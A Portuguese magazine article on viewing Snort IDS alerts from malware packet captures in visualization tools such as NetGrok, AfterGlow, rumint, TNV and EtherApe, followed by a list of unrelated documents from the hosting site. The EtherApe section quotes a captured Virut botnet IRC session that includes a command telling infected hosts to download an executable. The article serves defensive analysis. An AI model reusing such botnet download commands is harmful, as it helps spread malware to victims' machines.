Ferramentas para visualizar a saída do IDS
|
|
- Juan de Almeida Castelhano
- 8 Há anos
- Visualizações:
Transcrição
1 Ferramentas para visualizar a saída do IDS A visão do IDS CAPA Encontre invasores com essas fáceis ferramentas de visualização. por Russ Mcree Marcel Hol A enchente de dados brutos gerados pelos sistemas de detecção de intrusão (IDS) costuma ser grande demais para especialistas em segurança, e os sinais claros de invasão acabam muitas vezes passando despercebidos em meio ao ruído. As ferramentas de visualização de segurança oferecem uma forma fácil e intuitiva para guiar o especialista pelos meandros de informação rumo aos padrões indicadores de intrusão. Certas ferramentas de análise e detecção usam a biblioteca Packet Capture (PCAP, como é mais conhecida) para capturar o tráfego. Vários aplicativos que a utilizam conseguem salvar num arquivo PCAP os dados coletados durante uma sessão de escuta, de forma a permitir sua leitura e análise com outras ferramentas. Os arquivos PCAP oferecem uma forma conveniente de preservar e recapitular dados de invasão. Este artigo utiliza a PCAP para explorar algumas ferramentas de visualização livres. Em cada cenário será mostrada a aparência do ataque segundo o sistema de detecção de intrusão Snort [1], e em seguida o visual do mesmo incidente num aplicativo de visualização de segurança. Este artigo também explora as ferramentas de visualização NetGrok, AfterGlow, Rumint, TNV e Ether Ape. A maioria delas está disponível no live CD DAVIX [2], um sistema baseado no Slax e pré-carregado com várias ferramentas livres de análise e visualização. A forma mais fácil de explorar as ferramentas deste artigo é baixar o DAVIX. Caso seja preferível instalar os aplicativos no seu próprio sistema, confira os sites dos projetos para mais informações de instalação. A discussão a seguir supõe que o leitor possua conhecimentos básicos de sistemas de detecção de intrusão em geral, além do Snort em particular. Se você não tiver experiência com o Snort, confira seu manual do usuário no website do projeto [3]. Também há excelentes tutoriais de Snort online e impressos. Para este artigo, foi utilizada uma grande variedade de malwares, e as capturas de pacotes foram realizadas durante os ataques. Além destas, também foi usada uma captura de pacotes do OpenPacket.org, uma ótima fonte de capturas, assim como do EvilFingers.com, outro bom repositório de PCAP. O wiki do NetworkMiner [4], uma ferramenta para Windows de análise de PCAPs, inclui uma excelente lista de sites de PCAPs. Os arquivos deste artigo foram lidos pelo venerável Snort 2.7 num sistema Ubuntu 9.04 com as regras emerging-all.rules do site EmergingThreats.net. Se você tiver vontade de experimentar o DAVIX, use-o no modo gráfico com KDE dentro de uma máquina virtual com pelo menos 1 GB de memória. Essa quantidade de memória fornecerá espaço suficiente para garantir um bom desempenho do Snort na linha de comando e para oferecer poder suficiente para as exigentes ferramentas de visualização. NetGrok O NetGrok [5] que é uma ferramenta de visualização em Java, é independente de sistema operacional que lê arquivos PCAP diretamente e é capaz de escutar numa interface de rede. Especificamente, o NetGrok se descreve como...uma excelente ferramenta de diagnóstico em tempo Linux Magazine #59 Outubro de
2 CAPA Visualização de IDS real, que permite a rápida compreensão do tráfego de rede e a detecção fácil de problemas. O NetGrok é o resultado de um esforço durante o curso Information Visualization de 2008 lecionado por Ben Schneiderman na Universidade de Maryland, EUA. A equipe anunciou recentemente que o NetGrok será incorporado ao live CD DAVIX. A ferramenta de visualização NetGrok possui duas dependências, ambas já contidas no arquivo baixado, embora cada uma necessite de mais etapas de instalação. O pacote inclui uma versão antiga da Libpcap, mas é possível atualizála com apt-get install libpcap0.8 em qualquer sistema Debian ou Ubuntu. O NetGrok também requer a Libjpcap. Depois de descompactar o Net- Grok, entre no diretório Netgrok/lib/ linux/. Copie os arquivos da Libjpcap (libjpcap.so e jpcap.jar) para os diretórios /usr/lib/jvm/java6openjdk/ jre/lib/i386/ e /usr/lib/jvm/java6openjdk/jre/lib/ext/, respectivamente, ou equivalentes na sua distribuição. Em seguida, talvez seja necessário ajustar o arquivo groups.ini disponível na raiz do NetGrok. Em particular, os testes deste artigo apagaram a menção a redes sem fio na referência a Private1. Para testar o NetGrok, foi usado o PCAP Kraken.pcap, disponível no OpenPacket.org e listado na categoria Malicious (maliciosos) [6]. O arquivo tinha originalmente o nome 12b0c78f05f33fe25e08addc60bd9b7c.pcap devido ao hash MD5 do binário que gerou o tráfego, mas foi simplificado aqui para ficar de acordo com o nome malware. O Kraken é um spam bot; esta variante utiliza a porta TCP/UDP 447 para comando e controle. Após copiar o arquivo emergingall.rules do EmergingThreats.net para o diretório de regras do Snort e ativá-lo no arquivo snort.conf, foi executado o arquivo kraken.pcap por meio do Snort: sudo snort -c /etc/snort/snort. conf -r kraken.pcap -l output /kraken A listagem 1 mostra os alertas resultantes desse comando. Os alertas indicam claramente uma conversa entre a vítima, , e o servidor de comando e controle, Com essas informações, como o NetGrok encontra algo? Inicie o NetGrok com o comando java -jar netgrok jar. Será mostrada uma interface simples e elegante; em seguida, clique em File e Open PCAP File e selecio- Listagem 1: Arquivo kraken.pcap no Snort 01 [**] [1: :3] ET TROJAN Bobax/Kraken/Oderoor UDP 447 CnC Channel Initial Packet Inbound [**] 03 02/22 04:20: :447 > : UDP TTL:48 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF 05 Len: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 07 [Xref => [**] [1: :3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Inbound [**] 10 [Classification: A Network Trojan was detected] [Priority: 1] 11 02/22 04:20: :447 > : TCP TTL:48 TOS:0x0 ID:23263 IpLen:20 DgmLen:1500 DF 13 ***A**** Seq: 0xC Ack: 0x1D12B7D Win: 0x16D0 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 15 [Xref => [**] [1: :3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Outbound [**] 18 [Classification: A Network Trojan was detected] [Priority: 1] 19 02/22 04:20: :1054 > : TCP TTL:128 TOS:0x0 ID:459 IpLen:20 DgmLen:40 DF 21 ***A**** Seq: 0x1D12B7D Ack: 0xC6815DCD Win: 0x4470 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 23 [Xref => [**] [1: :3] ET TROJAN Bobax/Kraken/Oderoor TCP 447 CnC Channel Initial Packet Outbound [**] 26 [Classification: A Network Trojan was detected] [Priority: 1] 27 02/22 04:20: :1055 > : TCP TTL:128 TOS:0x0 ID:475 IpLen:20 DgmLen:64 DF 29 ***AP*** Seq: 0x95E9CBD1 Ack: 0xC63DF5FA Win: 0x4470 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 31 [Xref =>
3 Visualização de IDS CAPA Figura 1 Arquivo kraken.pcap na visão de grafos do NetGrok. ne kraken.pcap. Serão mostradas representações visuais de acordo com os dados gerados pelo Snort (figura 1). Os nós em vermelho são aqueles que usam a maior parte da banda, enquanto que os verdes usam a menor parte e os transparentes marcam máquinas que não utilizam banda alguma. As máquinas dentro da região tracejada são locais, ao passo que todas as demais encontram-se fora da rede local. Listagem 2: Arquivo ecard.pcap no Snort Para aproximar um nó, dê um duplo clique nele; ao passar sobre o nó, serão exibidos detalhes sob demanda na interface do NetGrok. No caso dos nós vermelhos, o mouse revelará seu endereço IP como Ao passar sobre o nó marrom (o que utiliza a segunda maior quantidade de banda), será exibido o IP Estes resultados estão perfeitamente de acordo com a saída do Snort. É possível ver a vítima conversando com 01 [**] [1: :4] ET TROJAN Storm Worm Encrypted Variant 1 Traffic (1) [**] 03 05/03 15:07: :22149 > : UDP TTL:116 TOS:0x0 ID:28417 IpLen:20 DgmLen:53 05 Len: [Xref => bin/cvsweb.cgi/sigs /VIRUS/TROJAN_Storm] 07 [Xref => o servidor de comando e controle O NetGrok também permite exibir visões de TreeMap [7]. Essa visão é ideal para grandes arquivos PCAP sem oclusão. Este artigo utilizou o PCAP ecard.pcap, uma captura obtida ao analisar o malware Storm. Este malware conversa incessantemente com seus pares por meio de UDP criptografado e gera muito ruído nos logs. O alerta do Snort é exibido na listagem 2. A visualização em TreeMap no Net- Grok define dois fatos claros. O maior falante é claramente ( bytes marcados como o grande cubo vermelho), que se encontra na rede local, indicada pela linha preta mais grossa que o separa das máquinas externas. A outra descoberta óbvia é a imensidão de pares com os quais a máquina local conversou em trechos de 106 a 212 bytes. O NetGrok também inclui úteis mecanismos de filtragem para permitir o isolamento de máquinas por IP, banda e grau (recebidos versus enviados). AfterGlow O AfterGlow [8], fruto de Raffael Marty, autor de Applied Security Visualization, é uma das muitas ferramentas de virtualização incluídas na distribuição DAVIX, facilmente acessível pelo menu Visualize. Como o AfterGlow usa dados no estilo CSV como entrada, foi usado o script tcpdump2csv.pl disponível em /usr/local/bin/ no DAVIX. O script Listagem 3: Arquivo camda.pcap no Snort 01 [**] [1: :7] ET ATTACK RESPONSE IRC Private message on non std port [**] 03 05/03 14:52: :1156 > : TCP TTL:128 TOS:0x0 ID:24739 IpLen:20 DgmLen:122 DF 05 ***AP*** Seq: 0xDE571EA6 Ack: 0xA4EB6BC Win: 0xFD92 TcpLen: [Xref => bin/cvsweb.cgi/sigs/attack_response/attack_response_ Non Standard_IRC] 07 [Xref => Linux Magazine #59 Outubro de
4 CAPA Visualização de IDS recebe a saída do tcpdump e grava um arquivo CSV. O uso recomendado do After- Glow normalmente inclui enviar (por pipes) todas as etapas para um único comando, mas a conversão de tcpdump para CSV é mais útil para propósitos de ilustração. Foi usado o camda.pcap, uma captura obtida durante a análise de uma amostra de Flood IRC. Os resultados de alertas do Snort do camda.pcap são mostrados na listagem 3. Para converter esse arquivo PCAP para CSV, foi executado o seguinte comando: tcpdump -vttttnnelr camda.pcap /usr/local/bin/tcpdump2csv.pl sip dip dport > camda.csv O tcpdump2csv.pl permite selecionar vários campos possíveis para gravar na saída CSV, incluindo marcas de hora, destino e origem IP, MAC e porta, assim como time-to-live (TTL) e outros parâmetros. Confira o conteúdo do script para mais detalhes. Para enviar o arquivo camda.csv resultante para o AfterGlow, foi usado: cat camda.csv afterglow.pl -c /usr/local/share/afterglow /color.properties -v dot -Tgif -o camda.gif A figura 2 inclui o tráfego local já esperado, mas também acentua as descobertas do Snort relativas ao tráfego IRC. Note que o IP de origem está conversando com o IP por meio da porta 5553 (uma porta não padrão do IRC). O AfterGlow gera saída em DOT para o GraphViz, portanto requer as ferramentas do GraphViz para gerar a imagem e o mapa da imagem. O GraphViz inclui o comando dot, que gera desenhos hierárquicos ou em camadas, enquanto o neato e o fdp geram modelos de mola, o twopi desenha diagramas radiais e o circo cria esquemas circulares. Um ótimo exemplo de imagem de modelo de mola se encontra no secviz.org [9]. Rumint O rumint de Greg Conti [10] é uma útil ferramenta de visualização que recebe arquivos PCAP sem manipulação ou conversão. Este artigo usou um dos arquivos PCAP anônimos do EvilFingers (anon_sid_ _ _5219_ pcap) para mostrar os poderes do rumint. Este exercício específico se mostrou útil em duas ocasiões. Como não há como ter certeza de que a análise do malware tenha sido feita por alguém competente afinal, os arquivos do EvilFingers são anônimos, este exercício oferece a oportunidade de demonstrar o valor da saída do Snort (particularmente Figura 2 Arquivo camda.pcap no AfterGlow. Listagem 4: Arquivo korgo.pcap no Snort ao executar as regras de Emerging Threats), assim como a visualização correspondente. Um dos alertas do Snort gerados por esse PCAP imediatamente identifica uma variante do Korgo.P como culpado. O Korgo, assim como o Padobot, é um antigo worm que explorava uma vulnerabilidade do LSASS do Microsof Windows em Segundo a F-Secure, como mostra o alerta abaixo, o worm contacta computadores remotos na porta TCP 445, explora a vulnerabilidade do LSASS e copia 01 [**] [1: :7] ET WORM Korgo.P offering executable [**] 03 06/27 19:47: :2710 > : TCP TTL:128 TOS:0x0 ID:49809 IpLen:20 DgmLen:1500 DF 05 ***A**** Seq: 0xDBBC709A Ack: 0xB6E50743 Win: 0xFDBF TcpLen: [Xref => bin/cvsweb.cgi/sigs /VIRUS/WORM_KORGO] 07 [Xref => => secure.com/v descs/korgo_p.shtml] Figura 3 Arquivo korgo.pcap na plotagem paralela de coordenadas. 44
5 Visualização de IDS CAPA Listagem 5: Arquivo gtbot.pcap no Snort 01 [**] [1: :3] COMMUNITY BOT GTBot ver command [**] 03 10/04 18:25: :5050 > : TCP TTL:64 TOS:0x0 ID:53296 IpLen:20 DgmLen:348 DF 05 ***AP*** Seq: 0xCA5E0BB6 Ack: 0xB97E3616 Win: 0x16D0 TcpLen: 20 Figura 4 Arquivo gtbot.cap no TNV. seu arquivo para o sistema remoto. O alerta do Snort que marcou essa descrição é mostrado na listagem 4. O arquivo PCAP anon_sid foi renomeado para korgo.pcap, que em seguida foi usado para executar o rumint. Para isso, bastou o rumint a partir do menu do DAVIX, clicar em File e depois em Load PCAP Dataset. Após o PCAP ser carregado no buffer, deve-se clicar em View e escolher algumas das sete opções. Recomenda-se a visualização Parallel Coordinate Plot com seis eixos. Para este PCAP, configuramos os eixos da seguinte forma: IP de origem, IP de destino, porta TCP de origem, porta TCP de destino, ID IP e TTL. O Rumint oferece várias outras opções para a visualização com eixos; basta selecionar pelo tipo de tráfego. A figura 3 imediatamente esclarece o alerta do Snort. Note como cada detalhe indicado no alerta do Snort fica imediatamente evidente no Parallel Coordinate Plot do rumint enquanto ele lê o quadro 22 do PCAP. O IP de origem se conecta ao IP de destino a partir da porta 2710 com destino à porta 445 (comum para malwares que exploram RPCs Microsoft). O alerta do Snort também exibe o ID IP e um TTL de 128, ambos claramente indicados no quinto e sexto eixos do rumint. TNV O TNV (Time-base Network Visualizer) [11] é escrito em Java e independente de plataforma, também pode usar como entrada saídas criadas para a Libpcap, ou realizar ele próprio a captura a partir de uma interface de sistema. John Goodall, do vizsec.org, criou o TNV como parte de seu trabalho de graduação. É possível usar o TNV diretamente a partir do menu Visualize do DA- VIX. Note que máquinas remotas na região esquerda da interface e a matriz de máquinas locais à direita podem ser reordenadas. Utilizamos uma velha variante do GTBot para gerar o arquivo gtbot.pcap (figura 4). A listagem 5 mostra um dos alertas do Snort gerados a partir do arquivo gtbot.pcap. O TNV é lento para carregar arquivos PCAP maiores, então é preciso ter paciência. Dito isso, provavelmente todos acharão os resultados muito úteis. O alerta do Snort apontou para o IP e a porta de origem 5050 conectando-se a na porta Essas descobertas são suportadas em todas as três visões do TNV, incluindo o tráfego específico de recebimento por portas (no painel à direita) e conectandose a (no painel primário exemplificado pela linha mais grossa de conexão e uma caixa popout), e os detalhes na visão de todos os pacotes. Para encontrar más intenções em arquivos PCAP menores, o TNV costuma oferecer gratificação instantânea. Não se esqueça de declarar uma faixa doméstica de endereços de rede que inclua o espaço primário de IPs usado no arquivo PCAP analisado. Listagem 6: Arquivo virut.pcap no Snort 01 [**] [1: :3] ET TROJAN W32.Virut.A joining an IRC Channel [**] 03 05/30 23:12: :1048 > : TCP TTL:128 TOS:0x0 ID:3686 IpLen:20 DgmLen:67 DF 05 ***AP*** Seq: 0x9A24EA7C Ack: 0x55A62BF6 Win: 0xFFFF TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_virut] 07 [Xref => => Linux Magazine #59 Outubro de
6 CAPA Visualização de IDS EtherApe O EtherApe [12] é mais uma das ofertas do DAVIX, encontrado no menu Visualize. Ele também carrega arquivos PCAP diretamente e, assim como seu compatriota rumint, reprisa o PCAP em tempo real enquanto exibe os resultados. Usando novamente um exemplo de PCAP baixado do EvilFingers. com, recebemos do Snort o alerta da listagem 6 após ele ler o arquivo anon_sid_ _ pcap. O arquivo PCAP foi renomeado para virut.pcap porque o W32.Virut.A foi o responsável por essa saída. O W32.Virut.A injeta seu código em todos os processos em andamento, abre uma backdoor na porta na máquina comprometida e em seguida tenta conectar-se a servidores IRC. O arquivo virut.pcap foi lido pelo EtherApe e os resultados são mostrados na figura 5. A máquina está comprometida e mostra claramente a backdoor aberta na porta TCP Os dados crus da sessão desse PCAP conforme disponíveis no EvilFingers também confirmam o alerta do Snort em conjunto com a visualização: NICK vouswcmm USER v :-Service Pack 2 JOIN &virtu :* PRIVMSG vouswcmm :!get ygyyqtqeyp.hj/dl/loadadv735.exe PING :i PONG :i JOIN &virtu Conclusão Uma visão aprimorada de ameaças de segurança leva a uma resposta mais capaz. Nesta altura, o leitor já deve ter entendido e concordado que a visualização de dados de segurança é uma verdadeira parceira do Snort. Quem se interessar pela visualização de dados de segurança pode começar a contribuir com o projeto Figura 5 Arquivo virut.pcap no EtherApe entrando num canal IRC. DAVIX. Especificamente seu líder Jan Monsch indicou que seria um grande trabalho para a comunidade alguém fazer a integração da ferramenta AfterGlow com o DAVIX. Um trabalho desse poderia permitir a conversão de formatos de dados entre diferentes ferramentas, além Mais informações [1] Snort: [2] DAVIX: [3] Manual de uso do Snort: de tornar o DAVIX mais acessível para muitas pessoas. A maioria das ferramentas disponíveis na distribuição DAVIX requer entradas variadas, às vezes em formatos proprietários. A entrada baseada em CSV para todas as ferramentas seria ótima para expandir o público do DAVIX. n [4] Network Miner: Publicly+available+PCAP+files [5] NetGrok: [6] Repositórios de capturas do OpenPacket.org: [7] TreeMap: [8] AfterGlow: [9] Fogos de artifício: visualized-storm-fireworks-your-4th-july [10] Rumint: [11] TNV: [12] EtherApe: Gostou do artigo? Queremos ouvir sua opinião. Fale conosco em cartas@linuxmagazine.com.br Este artigo no nosso site:
MINISTÉRIO DA EDUCAÇÃO
MINISTÉRIO DA EDUCAÇÃO SECRETARIA DE EDUCAÇÃO PROFISSIONAL E TECNOLÓGICA INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA DE SANTA CATARINA CAMPUS SÃO JOSÉ REDES DE COMPUTADORES Laboratório 2 Wireshark
Leia maisManual do Desktop Sharing. Brad Hards Tradução: Marcus Gama
Brad Hards Tradução: Marcus Gama 2 Conteúdo 1 Introdução 5 2 O protocolo do Buffer de Quadro Remoto (Buffer de Quadro Remoto) 6 3 Usando o Desktop Sharing 7 3.1 Gerenciando convites do Desktop Sharing........................
Leia maisSistema topograph 98. Tutorial Módulo Fundiário
Sistema topograph 98 Tutorial Módulo Fundiário Preparando o desenho para o Módulo Fundiário _ 1. Na área de trabalho do Windows, procure o ícone do topograph e dê um duplo clique sobre ele para carregar
Leia maisVisualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes)
Visualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes) 1. Quais são os requisitos de software para executar o Visualizador em meu computador? Para executar o Visualizador é necessário
Leia maisSistemas Operacionais. Curso Técnico Integrado Profa: Michelle Nery
Sistemas Operacionais Curso Técnico Integrado Profa: Michelle Nery Conteúdo Programático CONTAS DE E GRUPOS DE O Microsoft Management Console - MMC Permissões de Segurança de um Console Contas de Usuários
Leia maisDarkStat para BrazilFW
DarkStat para BrazilFW ÍNDICE Índice Página 1 O que é o DarkStat Página 2 DarkStat e a inicialização do sistema Página 2 DarkStat e a finalização do sistema Página 2 Tela Principal do DarkStat Página 3
Leia maisSuperintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá. LibreOffice Impress Editor de Apresentação
Superintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá LibreOffice Impress Editor de Apresentação Iniciando o Impress no Linux Educacional 4 1. Clique no botão 'LE' no
Leia maisBoletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema
Boletim Eletrônico de Recolhimento Manual do Sistema Versão 1.2 Junho / 2013 Sumário 1. Introdução... - 3-2. O Sistema BOLETIM ELETRÔNICO DE RECOLHIMENTO... - 3-3. Pré-requisitos... - 3-4. Primeiro Acesso...
Leia maisPowerPoint 2010 para o Office 365 para empresas
PowerPoint 2010 para o Office 365 para empresas Faça a migração O Microsoft PowerPoint 2013 tem uma aparência diferente das versões anteriores. Assim, veja a seguir uma visão geral dos novos recursos e
Leia maisNotas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0
Notas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0 Este documento contém informações importantes sobre esta versão. Não se esqueça de fornecer essas informações
Leia maisTutorial de uso do Subversion com RapidSVN
Universidade Federal de São Carlos Departamento de Computação Tutorial de uso do Subversion com RapidSVN João Celso Santos de Oliveira Orientação: Prof.ª Dra. Marilde T. P. Santos - São Carlos - Agosto
Leia maisO QUE É A CENTRAL DE JOGOS?
O QUE É A CENTRAL? A Central de Jogos consiste de duas partes: Um site na Internet e um programa de computador (Central) que deve ser instalado em sua máquina. No site www.centraldejogos.com.br, você pode
Leia mais1. Capturando pacotes a partir da execução do traceroute
Neste laboratório, iremos investigar o protocolo IP, focando o datagrama IP. Vamos fazê-lo através da analise de um trace de datagramas IP enviados e recebidos por uma execução do programa traceroute (o
Leia maisTRBOnet MDC Console. Manual de Operação
TRBOnet MDC Console Manual de Operação Versão 1.8 ÍNDICE NEOCOM Ltd 1. VISÃO GERAL DA CONSOLE...3 2. TELA DE RÁDIO...4 2.1 COMANDOS AVANÇADOS...5 2.2 BARRA DE FERRAMENTAS...5 3. TELA DE LOCALIZAÇÃO GPS...6
Leia maisO EDITOR DE APRESENTAÇÕES POWER POINT
O EDITOR DE APRESENTAÇÕES POWER POINT O Power Point é um poderoso editor de apresentações muito utilizado quando for preciso fazer a exibição de trabalhos, projetos, aulas e afins em slides coloridos e
Leia maisProcedimentos para Configuração de Redirecionamento de Portas
Procedimentos para Configuração de Redirecionamento de Portas A opção avançada de Port Forwarding permite que você defina uma única porta pública ou Range de portas em seu roteador para redirecionar a
Leia maisPortaria Express 2.0
Portaria Express 2.0 A portaria do seu condomínio mais segura e eficiente. Com a preocupação cada vez mais necessária de segurança nos condomínio e empresas, investe-se muito em segurança. Câmeras, cercas,
Leia maisSistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com
Sistemas Operacionais Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Estruturas de Sistemas Operacionais Um sistema operacional fornece o ambiente no qual os programas são executados. Internamente,
Leia maisComo criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo.
Como criar um blog Criando o blog Vá em www.blogger.com. Entre com sua conta google (a mesma que você usa para acessar o gmail). Escolha um perfil. Na página seguinte, clique no botão novo blog. Será aberta
Leia maisCADASTRO DE OBRAS E PROJETOS DE ENGENHARIA
CADASTRO DE OBRAS E PROJETOS DE ENGENHARIA SET 2014 2 INTRODUÇÃO Este manual objetiva orientar os servidores no processo do cadastro de projetos no Sistema Channel para viabilizar o acompanhamento físico-financeiro
Leia maisNotas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1
Notas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1 Este documento contém informações importantes sobre esta versão. Lembre-se de fornecer essas informações a todos os usuários antes de
Leia maisTutorial ConvertXtoDVD 3
Tutorial ConvertXtoDVD 3 Índice: Adicionando seus arquivos de vídeo Adicionando um ou mais vídeos Página 2 Qualidade da conversão Página 3 Personalizando o menu Página 4 Escolhendo um template para o menu
Leia maisUsando o Conference Manager do Microsoft Outlook
Usando o Conference Manager do Microsoft Outlook Maio de 2012 Conteúdo Capítulo 1: Usando o Conference Manager do Microsoft Outlook... 5 Introdução ao Conference Manager do Microsoft Outlook... 5 Instalando
Leia maisPrimeiros passos das Planilhas de Obra v2.6
Primeiros passos das Planilhas de Obra v2.6 Instalação, configuração e primeiros passos para uso das planilhas de obra Elaborado pela Equipe Planilhas de Obra.com Conteúdo 1. Preparar inicialização das
Leia maisProf. Marcos Monteiro. http://www.marcosmonteiro.com.br contato@marcosmonteiro.com.br
Prof. Marcos Monteiro http://www.marcosmonteiro.com.br contato@marcosmonteiro.com.br https://www.snort.org Pra Instalar: Pacotes necessários para a instalação do Snort: libpcap libpcre tcpdump openssl
Leia mais... MANUAL DO MODERADOR SERVIÇOS DE WEB
... MANUAL DO MODERADOR SERVIÇOS DE WEB ÍNDICE 1. IMPLEMENTAÇÃO 4 1.1 PAINEL DE CONTROLE 4 1.2 SENHA 4 1.3 INSTALAÇÃO 4 1.3.1 INSTALAÇÃO PARA MODERADOR 4 1.3.2 INSTALAÇÃO PARA PARTICIPANTES 8 1.3.2.1 PELO
Leia maisMANUAL DA SECRETARIA
MANUAL DA SECRETARIA Conteúdo Tela de acesso... 2 Liberação de acesso ao sistema... 3 Funcionários... 3 Secretaria... 5 Tutores... 7 Autores... 8 Configuração dos cursos da Instituição de Ensino... 9 Novo
Leia maisManual do usuário. Viewer
Manual do usuário Viewer Outubro / 2010 Manual do Heron Viewer Índice Heron Viewer... 2 Instalação... 2 Configuração... 5 Configurando o servidor (Computador que acompanha o aparelho Heron)... 5 Configurando
Leia mais1. Explicando Roteamento um exemplo prático. Através da análise de uns exemplos simples será possível compreender como o roteamento funciona.
Aula 14 Redes de Computadores 24/10/07 Universidade do Contestado UnC/Mafra Sistemas de Informação Prof. Carlos Guerber ROTEAMENTO EM UMA REDE DE COMPUTADORES A máscara de sub-rede é utilizada para determinar
Leia maisGuia: como instalar o Ubuntu Linux
Guia: como instalar o Ubuntu Linux Você cansou do Windows e quer se aventurar a usar alguma distribuição Linux, mas não sabe por onde começar? Montamos um passo a passo com todas as etapas necessárias
Leia maisDo Word 2007 para o Office 365 para empresas
Do Word 2007 para o Office 365 para empresas Faça a migração O Microsoft Word 2013 para área de trabalho está diferente das versões anteriores. Assim, veja a seguir uma visão geral dos novos recursos e
Leia maisObjetivo: descrever como abrir uma solicitação de suporte técnico através da internet.
Suporte Técnico Hotline Como abrir uma solicitação Denilson Pegaia Objetivo: descrever como abrir uma solicitação de suporte técnico através da internet. Aviso: Este documento apresenta dicas e exemplos
Leia maisInstruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM
Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Índice Instruções de Instalação....... 1 Requisitos do sistema........... 1 Código de autorização.......... 1 Instalando...............
Leia maisSimulado Informática Concurso Correios - IDEAL INFO
Simulado Informática Concurso Correios - IDEAL INFO Esta prova de informática é composta por 20 (vinte) questões de múltipla escolha seguindo o molde adotado pela UnB/CESPE. O tempo para a realização deste
Leia maisTOP SAÚDE SEPACO AUTOGESTÃO
TOP SAÚDE SEPACO AUTOGESTÃO Dezembro / 2014 Sumário 1. Apresentação e acesso ao sistema...3 2. Tela inicial do sistema...5 3. Autorização de Procedimento Via Prestador...6 3.1. Impressão Guia TISS...6
Leia maisExemplo: Na figura 1, abaixo, temos: Clique aqui para continuar, que é a primeira atividade que você precisa realizar para iniciar seus estudos.
Visão Geral VISÃO GERAL Esse material abordará o acesso ao AVA (Ambiente Virtual de Aprendizagem) da Proativa do Pará, com intenção de ilustrar os aspectos na visão do Aprendiz. Essa abordagem dedica-se
Leia maisTUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA. Os dados de suas coletas devem ser organizados em uma planilha eletrônica, de modo
TUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA ESTIMATIVAS DE RIQUEZA DE ESPÉCIES Softwares utilizados: Excel, EstimateS e Statistica. Preparação dos dados Os dados de suas coletas devem ser organizados
Leia maisLab 4 Análise de Pacotes utilizando o TCPDUMP
Objetivo: Lab 4 Análise de Pacotes utilizando o TCPDUMP i) Utilizar aplicativo de análise de pacotes TCPDUMP. TCPDUMP: O tcpdump é um programa cuja utilidade principal é visualizar e analisar o tráfego
Leia maisManual do Usuário. Protocolo
Manual do Usuário Protocolo Índice de capítulos Parte I - Processos............................... 01 1 - Buscar................................ 01 2 - Listar................................ 02 3 - Abertura..............................
Leia maisManual de instalação, configuração e utilização do Assinador Betha
Manual de instalação, configuração e utilização do Assinador Betha Versão 1.2 Histórico de revisões Revisão Data Descrição da alteração 1.0 18/09/2015 Criação deste manual 1.1 22/09/2015 Executando a instalação
Leia maisMANUAL DIPAM A Versão de 10/05/2012
MANUAL DA DIPAM A Versão de 10/05/2012 1 Índice Geral... 3 Configuração Mínima... 3 Instalação... 4 Procedimento pós-instalação para sistemas com Vista ou Windows 7... 8 Uso do Programa DIPAM-A... 10 DIPAM
Leia maisProjeto ECA na Escola - Plataforma de Educação à Distância
Página1 Apresentação Projeto ECA na Escola - Plataforma de Educação à Distância Olá Participante do Projeto ECA na Escola, Este tutorial pretende auxiliá-lo na navegação na Plataforma de Educação à Distância
Leia maisINSTRUÇÕES DE INSTALAÇÃO
INSTRUÇÕES DE INSTALAÇÃO RMCCI Versão 4.0 1 28/11/2005 Para instalar o RMCCI Versão 4.0 monousuário Você precisará ter o CD-ROM ou os arquivos de instalação originais desta versão. I - REQUISITOS DE SISTEMA
Leia maisPara o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.
POWERPOINT 1. O QUE É UMA APRESENTAÇÃO Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides. Em cada slide podemos ter vários elementos ou objetos
Leia maisLync Acessando o Lync Web App
Lync Acessando o Lync Web App Saiba como ingressar em uma reunião, quais são os recursos disponíveis, as configurações e conheça o layout do Lync Web App. Sumário Lync Web App... 1 Ingressar em uma Reunião
Leia maisNo projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano.
No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. Essa estratégia foi deixada para trás. Atualmente, o software de rede é altamente
Leia maisFEMA Fundação Educacional Machado de Assis INFORMÁTICA Técnico em Segurança do Trabalho P OW ERPOI NT. Escola Técnica Machado de Assis Imprensa
P OW ERPOI NT 1 INTRODUÇÃO... 3 1. Iniciando o PowerPoint... 3 2. Assistente de AutoConteúdo... 4 3. Modelo... 5 4. Iniciar uma apresentação em branco... 6 5. Modo de Exibição... 6 6. Slide Mestre... 7
Leia maisExperiência 05: CONFIGURAÇÃO BÁSICA DE UMA REDE. Objetivo Geral Criar uma rede ponto-a-ponto com crossover e utiizando switch.
